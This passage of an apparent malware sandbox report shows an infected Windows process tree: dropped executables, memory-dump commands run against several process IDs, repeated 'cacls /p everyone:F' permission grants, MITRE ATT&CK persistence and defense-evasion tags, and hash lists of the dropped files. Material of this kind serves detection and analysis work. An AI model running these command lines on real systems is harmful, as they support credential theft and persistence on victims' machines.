- Suspicious use of AdjustPrivilegeToken
PID:5152
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 3972 C:\Windows\TEMP\nbuyiybyv\3972.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:636
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 4348 C:\Windows\TEMP\nbuyiybyv\4348.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4512
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 3772 C:\Windows\TEMP\nbuyiybyv\3772.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4240
-
-
C:\Windows\SysWOW64\gykgye.exeC:\Windows\SysWOW64\gykgye.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1764
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1328 --field-trial-handle=3060,i,1774866140584649235,8085848018931772189,262144 --variations-seed-version /prefetch:81⤵PID:2580
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\iylstni.exe1⤵PID:2784
-
C:\Windows\ime\iylstni.exeC:\Windows\ime\iylstni.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3812
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\nlmttyea\iylstni.exe /p everyone:F1⤵PID:1732
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3632
-
-
C:\Windows\system32\cacls.execacls C:\Windows\nlmttyea\iylstni.exe /p everyone:F2⤵PID:3448
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\bestbnuee\lslnam.exe /p everyone:F1⤵PID:772
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4868
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\bestbnuee\lslnam.exe /p everyone:F2⤵PID:1528
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\nlmttyea\iylstni.exe /p everyone:F1⤵PID:2544
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4336
-
-
C:\Windows\system32\cacls.execacls C:\Windows\nlmttyea\iylstni.exe /p everyone:F2⤵PID:5456
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\iylstni.exe1⤵PID:4604
-
C:\Windows\ime\iylstni.exeC:\Windows\ime\iylstni.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3308
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\bestbnuee\lslnam.exe /p everyone:F1⤵PID:2044
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:368
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\bestbnuee\lslnam.exe /p everyone:F2⤵PID:1532
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
4.0MB
MD5ac1629231a1efb3d21b7d3c0765669be
SHA13a7e60d85db69b20bbcc26db51037d4c4f7c615c
SHA2564a16b4819703e2509470503050c359e90f99b9fbda575d254302d072959dbcf4
SHA5121be3e4342ac5621223a6b0443ec2d01f4fedeed7336da0554014fad10ac9327d0f33a4f0ce50381aca1f0417920e7a6b98c0da0381b1fcdd6e774764686b556e
-
Filesize
818KB
MD5bdc3216f791c976463ad1bd27d798690
SHA1d67e4b6cde528561ff49558082f55d5bd0f7a9e1
SHA256b66d960dc13e497f39c5b9ea9ce9f06939ee00a6d0a630f912fe16e560d55d7a
SHA5122ea891a467fc0d7130f3f9b284a698ffa7ad4ee4b6194e9893f7822bfaf7f04b7edcf954ed0a44ec0de0e5142220a5f5eca9fb0410b21d567f134f6d9f0f92df
-
Filesize
7.4MB
MD53f4904075c05091a5f825b37cce843d0
SHA1f4f49ca4a9208d7a1fdf418b34901582f757bac1
SHA25657a1f93ef43810be31d731aa513eb59721b647b041e79546ff29e450da27fedc
SHA5121650cce6bc4cc4846b99a66eb2e69951e33ee6d310f47c00092d64d81c3d09f79162b4c094711592b12a88e44d241bcad7ca5021593812c416c93dcc30c54fe3
-
Filesize
3.7MB
MD51ec82fddf5cc72dac9bc60ff9d59a72c
SHA1d0090106d967903171b4fb6d5f2d14dabbc51e39
SHA2567546ecadace2780a0c74dd0ba7d57698ab382e5672740e10bc86203ae4bf2c3a
SHA51281b20924bec0817360d4e28277177a860a0c62d0ec1682d24cef92cab3caf2ca29a244fb90b66978ad2add50e65ded866b2d90a13f63fe88ce7a428d7714b00f
-
Filesize
2.9MB
MD541370ac393b978b2d13dfb111d73917c
SHA1aeaff324576744ed2edefd37cdabc51e4ded8461
SHA256b8372a296797b2af5b29266ee5380d2c1603d27f9fe27be3cf779a1da18c0ddd
SHA512a5074d948dab64345ff6fb24229a4a3a079b2e8244dabf028cb5839c0d2613abb306927644cb0db38316eb6ceddb185f95b9df3544a17e99f799247788230ba1
-
Filesize
33.5MB
MD5635d62ab33d9ad438259cef12af0a001
SHA1669a84b31e3e155929100f4abc288cf62282a729
SHA256f0ef8df64392a07a6befc5d8a4f8d1d20c6566b2492ef9a681055b6640f1f941
SHA512272d682457910aa8c90dd8e4ade9f328fae6b7c07ea4696c108c2de29c9389f4f52dcbdb7184ba726fbe90f17e3c63ed00bad3c3190f2c4ba370e04233c516b4
-
Filesize
1.2MB
MD5f3f8958c8ec0986d4daf33855c73244d
SHA15f4e09bd94563e6bee0d2e9f098112a56019efaf
SHA2564df302cdc2c7c850cca92d6f905a53be4bbf10281f9590ed8273e40a4fd42f4d
SHA5125c140f50ca9c38344fa9f1f710ac6aed2aaf022a937df038e64a70c3416808a1eaf4803b2652310eb56a67ba4eaa2d281458e6ef7a07c7709adac37c8e180ba7
-
Filesize
26.5MB
MD5bd90fa4712fb6a979e4ef3e5da58197e
SHA1992103a5c43afd97fa27ff7379b93f3e8bbda81f
SHA256b1fabe428f8ee81b7497f4459606342a894c45ac95d4188005d88fc57aec8c61
SHA51256aeaa3d70e04c670434a3cbb16320c5ff2f16bba5d4df000f7c2f3f86e60d4e774de90b4d8adef307d1a2796675fb5533a0f0a68707bf4cb4c8f6fc3fecd590
-
Filesize
2.2MB
MD5b4c730c960ba6a290e3575e1703f91dd
SHA1943d4a0c52319889a0bcdd04769c42f264d28ad5
SHA25678b76d4b04cd088a11ba2c3a5702108d930bdf920e5250f160cd9de2c522b1e7
SHA512db01178bd8efb3d4e1134a1aade71a39d47c0ca77c7453180b18d17c28284776839ffb055ae8a8f1868776eaed4bba9e411d5288d7d472d548012f0bde6ae75f
-
Filesize
20.9MB
MD503d7499656f0feb0c5f622326bc3fa38
SHA13693cfe7adfab254921cbddad40f7693380d8316
SHA256f5df8f8809da66516aa2926b8eed78852e3cd030f45d9fca9bf96226e5567ee8
SHA512229d8a5830284a8305e5827cec2f140da2f3d4b4bae5e8e7b18caf53ceaa80a54f128319d635f2ac8307705d21b36fa7b098c52f47d6b9c8c890c513b6093b84
-
Filesize
4.2MB
MD5508a99f9c48aec557d962b6f8f1595af
SHA1b8ddb2d09919a9465926a9554f2025b572867e61
SHA25653ebdda99e4455ddbdc77175849bbff4f7343ee6c21fd6fcc4869484c31c44fe
SHA5122635e6b998b5185c4b52b026c9617f3f0db25c4e7a5e611dbd0e4705f3bfe5094d94693072d08d2e389c96e5493462bd3156530a51e889d35e790b17c64e61e5
-
Filesize
45.1MB
MD51dd888a5d468b84d53d670b41ee8eb34
SHA1c4628ee58699dacde64789a1f77eeea9c44af658
SHA2560fbe6d2c5d7afa4e97819ada0f46291e8e33c96f7ff4407832e03d0ae112440c
SHA512f633faecee12edb737ce9f4e7d28ce3ad081597ce42a5239b96cd5e1cb12317765f8432837824c9174def16f5b3e195b0577aa505bd4a386f431f361a6ce2444
-
Filesize
1.9MB
MD52259240bece56b250b1cf72aea5edcaf
SHA1e5e84ea1a435d8f6c6d64a9be10527de9b45c4c1
SHA256d1192511e0b36cd325e5a221a4fa86170861f69819ad45bd1096b05740b4c58f
SHA51251656779ee7e54801936f30fe093c40584279d05b137ca6a94ad75c1a770cebb73f085efbee14a36f1c3e777e996d7e967ad7d831bf114a03c0ea520a233f679
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
160B
MD52691e1a3aca1adf91211ad430e522255
SHA10873fc1d559d1c2e1ee4a09590cccc4ea5d94904
SHA2564b080621f4fe73a9ef33f0b39faffbb2e22ed055c0768a8d94ff821771569e0b
SHA512b20ba3ffde1e999273c5af1a2356a2d7d620d0f1229a4be50595169ef7de6cb6dbf14ea9945b3fb797462520ed90567ff3bd9602c49343d6cd5fd5358504a649
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
8.7MB
MD5feb27535069efe942fe981e8ece07191
SHA1a466dab8bf289091b6219ab038211b9b5fe402ec
SHA256619e437faaca36c79bade76d4bac44871a3cfd95059edf8497af4aee2577b47f
SHA512a58aa6f0e681275ba1268793f00fccc3ca797ef1b7dd8a48880e53fe08601c3e5ccb079ad1b9628d5cd4bc4f29ed65ec2301dd16b068db5fa7b3218a9631bfae
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376